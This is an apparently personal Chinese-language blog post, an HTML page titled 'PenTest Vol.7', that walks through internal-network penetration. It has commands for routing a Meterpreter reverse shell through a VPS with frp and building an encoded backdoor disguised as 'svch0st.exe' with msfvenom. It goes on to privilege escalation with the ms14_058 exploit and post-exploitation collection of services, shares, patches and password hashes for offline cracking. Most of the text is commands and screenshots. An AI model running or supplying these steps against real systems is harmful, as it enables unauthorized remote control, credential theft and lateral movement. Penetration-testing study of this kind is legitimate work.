<!DOCTYPE html><html lang="zh-cn"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><meta name="format-detection" content="telephone=no"><meta name="format-detection" content="email=no"><meta name="description"><meta name="keywords" content="Hexo, Gruntjs, Nodejs, Reactjs, Vuejs"><title>PenTest Vol.7 - 内网 | 内网渗透部分 - Naykcin's Page</title><link rel="stylesheet" href="/css/main_style.min.css"><link rel="icon" href="/logo.png"></head><body><input id="navi" type="checkbox"><ul class="main-navication"><li><a href="/"><span>Home</span></a></li><li><a href="https://github.com"><span>Github</span></a></li><li><a href="https://www.v2ex.com/"><span>V2EX</span></a></li></ul><div class="wrapper" id="wrap"><div class="post-header"><label class="navi-button light" for="navi">MENU</label><img class="background" src="http://47.95.140.43/typora_pic/background.JPG"><div class="post-title"><h1 class="title">PenTest Vol.7 - 内网 | 内网渗透部分</h1><ul class="meta"><li><i class="icon icon-author"></i>Naykcin</li><li><i class="icon icon-clock"></i>12 Minutes</li><li><i class="icon icon-calendar"></i>November 22, 2019</li></ul></div></div><div class="article-content" style="max-width:800px"><h2 id="PenTest-Vol-7-内网-内网渗透部分-持续更新"><a href="#PenTest-Vol-7-内网-内网渗透部分-持续更新" class="headerlink" title="PenTest Vol.7 - 内网 | 内网渗透部分 [持续更新]"></a><center>PenTest Vol.7 - 内网 | 内网渗透部分 [持续更新]</center></h2><p>💡 通常都是在内网环境中利用 msfvenom 制作后门并测试，但是真实环境中不能设置 Kali 内网 IP 来使目标系统 reverse 连接，这时就需要利用 vps 做一个端口转发，在这里记录一下姿势。</p>
<h4 id="📍-首先说思路："><a href="#📍-首先说思路：" class="headerlink" title="📍 首先说思路："></a>📍 首先说思路：</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">// Target 内网</span><br><span class="line">Windows XP				192.168.0.205</span><br><span class="line"></span><br><span class="line">// 公网 vps</span><br><span class="line">ubuntu						1.1.1.1</span><br><span class="line"></span><br><span class="line">// Hacker</span><br><span class="line">Kali							192.168.0.105</span><br></pre></td></tr></table></figure>

<p>公网 vps 运行 frp server，Kali 运行 frp client，将 Kali 本地的端口映射至 vps。</p>
<ol>
<li><p>下载 frp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/fatedier/frp/releases</span><br></pre></td></tr></table></figure>
</li>
<li><p>首先配置公网 vps frp 服务端：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// ./frps.ini</span><br><span class="line"></span><br><span class="line">[common]</span><br><span class="line">bind_port = 6767		// 与 Kali 转发的端口</span><br></pre></td></tr></table></figure>

<p>然后启动服务端：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frps -c ./frps.ini</span><br></pre></td></tr></table></figure>
</li>
<li><p>接着配置客户端（Kali）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// ./frpc.ini</span><br><span class="line"></span><br><span class="line">[common]</span><br><span class="line">server_addr = vps 地址</span><br><span class="line">server_port = 6767 		// 与 Kali 转发的端口</span><br><span class="line"></span><br><span class="line">[msf]</span><br><span class="line">type = tcp</span><br><span class="line">local_ip = 127.0.0.1</span><br><span class="line">local_port = 1234				// 弹回 Kali 本地的端口</span><br><span class="line">remote_port = 16200			// taget reverse 连接 vps 的端口，和生成后门的端口一致</span><br></pre></td></tr></table></figure>

<p>然后启动客户端：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frpc -c ./frpc.ini</span><br></pre></td></tr></table></figure>
</li>
<li><p>生成后门</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=vpsIP LPORT=16200 -b&quot;\x00&quot; -e x86/shikata_ga_nai -f exe &gt; /root/svch0st.exe</span><br></pre></td></tr></table></figure>

<p>然后开启 msfconsole 监听本地端口：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf5&gt; use exploit/multi/handler</span><br><span class="line">msf5&gt; set lhost 127.0.0.1</span><br><span class="line">msf5&gt; set lport 1234</span><br><span class="line">msf5&gt; exploit</span><br></pre></td></tr></table></figure>
</li>
<li><p>然后即可弹回 shell。</p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%8812.54.27.png" alt="屏幕快照 2019-12-31 上午12.54.27"></p>
<p>接着查看用户权限，尝试提权失败，获取系统信息看是否有可以利用的内核漏洞来提权：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; getuid</span><br><span class="line">meterpreter&gt; getsystem</span><br></pre></td></tr></table></figure>

<p>搜索后发现目标主机可能存在 ms14-058 提权漏洞，这里要注意利用 frp 再映射一个端口，建立新的文件夹，生成新的服务端和客户端配置文件，再次监听、映射端口，然后建立一个新的 msfconsole，监听本地另外一个端口，弹回一个高权限的 shell：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// msfconsole 1 执行</span><br><span class="line">msf5&gt; use exploit/windows/local/ms14_058_track_popup_menu</span><br><span class="line">msf5&gt; set lhost vpsIP</span><br><span class="line">msf5&gt; set lport 12345</span><br><span class="line">msf5&gt; exploit</span><br><span class="line"></span><br><span class="line">// msfconsole 2 执行</span><br><span class="line">msf5&gt; use exploit/multi/handler</span><br><span class="line">msf5&gt; set lhost 127.0.0.1</span><br><span class="line">msf5&gt; set lport 1235</span><br><span class="line">msf5&gt; exploit</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.05.05.png" alt="屏幕快照 2019-12-31 上午2.05.05"></p>
</li>
</ol>
<p>至此已经获取了内网的 system 权限，接下来的思路是进行本地信息收集，进行内网横向移动。</p>
<h4 id="📍-横向移动部分"><a href="#📍-横向移动部分" class="headerlink" title="📍 横向移动部分"></a>📍 横向移动部分</h4><p>⚙️ <strong>本地信息收集</strong></p>
<ul>
<li><p>获取目标主机的分区情况</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; run post/windows/gather/forensics/enum_drives</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.11.18.png" alt="屏幕快照 2019-12-31 上午2.11.18"></p>
</li>
<li><p>判断是否是虚拟机</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; run post/windows/gather/checkvm</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.13.18.png" alt="屏幕快照 2019-12-31 上午2.13.18"></p>
</li>
<li><p>获取运行的服务（包括权限、路径等详细信息）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; run post/windows/gather/enum_services</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.16.02.png" alt="屏幕快照 2019-12-31 上午2.16.02"></p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.16.17.png" alt="屏幕快照 2019-12-31 上午2.16.17"></p>
<p>输出的文件中记录了详细信息。</p>
</li>
<li><p>获取安装的应用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterptreter&gt; run post/windows/gather/enum_applications</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.18.53.png" alt="屏幕快照 2019-12-31 上午2.18.53"></p>
</li>
<li><p>获取目标主机的共享文件夹等</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; run post/windows/gather/enum_shares</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.20.20.png" alt="屏幕快照 2019-12-31 上午2.20.20"></p>
</li>
<li><p>列出目标主机最近的操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter&gt; run post/windows/gather/dumplinks</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.22.46.png" alt="屏幕快照 2019-12-31 上午2.22.46"></p>
</li>
<li><p>查看目标主机补丁信息，列出可能存在的漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/enum_patches</span><br></pre></td></tr></table></figure>

<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.24.15.png" alt="屏幕快照 2019-12-31 上午2.24.15"></p>
</li>
<li><p>利用脚本进行详细的信息收集</p>
<ul>
<li><p>run scraper</p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.30.24.png" alt="屏幕快照 2019-12-31 上午2.30.24"></p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.31.37.png" alt="屏幕快照 2019-12-31 上午2.31.37"></p>
</li>
<li><p>run winenum</p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.33.28.png" alt="屏幕快照 2019-12-31 上午2.33.28"></p>
<p><img src="http://47.95.140.43/tu/pentest7/%e5%b1%8f%e5%b9%95%e5%bf%ab%e7%85%a7%202019-12-31%20%e4%b8%8a%e5%8d%882.34.46.png" alt="屏幕快照 2019-12-31 上午2.34.46"></p>
<p>例如系统信息、网络配置、密码 hash 值、注册表、环境变量等都可以获取到。</p>
<p>hash 值可以利用 john 直接进行离线爆破。</p>
<p>如果编码有问题可以尝试更改编码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Preferences -&gt; Encodings -&gt; 勾选中文简体的GBK</span><br><span class="line">Terminal -&gt; Set Character Encoding -&gt; 选择GB2312</span><br></pre></td></tr></table></figure>

</li>
</ul>
</li>
</ul>
</div><div class="article-meta" style="max-width:800px"></div><div class="article-comment" style="max-width:800px"><div class="ds-thread" id="ds-thread" data-thread-key="ck67g9f73000d3lozh6ex4jic" data-title="PenTest Vol.7 - 内网 | 内网渗透部分" data-url="http://yoursite.com/2019/11/22/内网渗透/" site-name="ueibo"></div><script>var siteName = document.getElementById('ds-thread').getAttribute('site-name');
var duoshuoQuery = {short_name: siteName};
(function() {
  var ds = document.createElement('script');
  ds.type = 'text/javascript';ds.async = true;
  ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
  ds.charset = 'UTF-8';
  (document.getElementsByTagName('head')[0] 
  || document.getElementsByTagName('body')[0]).appendChild(ds);
})();</script></div><ul class="navication"><li class="home"><a href="/"><i class="icon icon-home"></i></a></li><li><a href="/2019/11/24/burp插件jsEncrypter用法/"><i class="icon icon-arror-left"></i></a></li><li><a href="/2019/11/20/未授权访问漏洞/"><i class="icon icon-arror-right"></i></a></li></ul><div class="page-footer"><div class="top"><ul class="social"><li><a href="https://github.com/NickYan7" title="Github" target="_blank"><i class="icon icon-github"></i></a></li><li><a href="http://47.95.140.43/tu/721580653348_.pic.jpg" title="wechat" target="_blank"><i class="icon icon-wechat"></i></a></li></ul></div><div class="bottom"><p class="copyright">© 2020 Naykcin's Page</p></div></div></div><script>var wrap = document.getElementById('wrap');
window.onload = function () {
  wrap.className += ' done';
}</script></body></html>